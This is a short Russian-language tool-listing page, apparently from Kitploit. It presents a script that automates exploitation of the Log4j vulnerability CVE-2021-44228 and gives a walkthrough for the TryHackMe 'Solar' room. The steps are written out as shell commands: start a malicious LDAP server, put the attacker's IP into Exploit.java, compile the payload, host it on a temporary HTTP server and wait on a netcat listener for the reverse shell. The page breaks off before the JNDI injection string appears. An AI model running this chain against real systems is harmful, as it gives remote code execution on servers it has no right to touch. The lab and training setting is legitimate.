Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!
log4j — Автоматическая эксплуатация уязвимости Log4j CVE-2021-44228 с использованием LDAP-сервера и компиляции полезной нагрузки, включая пошаговое руководство для прохождения задания Solar на TryHackMe. | Kitploit
Автоматическая эксплуатация уязвимости Log4j CVE-2021-44228 с использованием LDAP-сервера и компиляции полезной нагрузки, включая пошаговое руководство для прохождения задания Solar на TryHackMe.
1. Запустите log4j.py (это установит все необходимые приложения и запустит LDAP-сервер)
root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251
2. Добавьте IP-адрес атакующего в файл Exploit.java
3. Скомпилируйте полезную нагрузку
root@kitploit:~
javac Exploit.java -source 8 -target 8
4. Временный HTTP-сервер
root@kitploit:~
python3 -m http.server 8888
5. Слушатель netcat
root@kitploit:~
nc -lnvp 9999
6. Наконец, всё, что осталось сделать, — это запустить эксплойт и отправить наш JNDI-синтаксис! Обратите внимание на изменения номера порта (теперь он указывает на наш LDAP-сервер) и на ресурс, который мы запрашиваем, указывая наш эксплойт: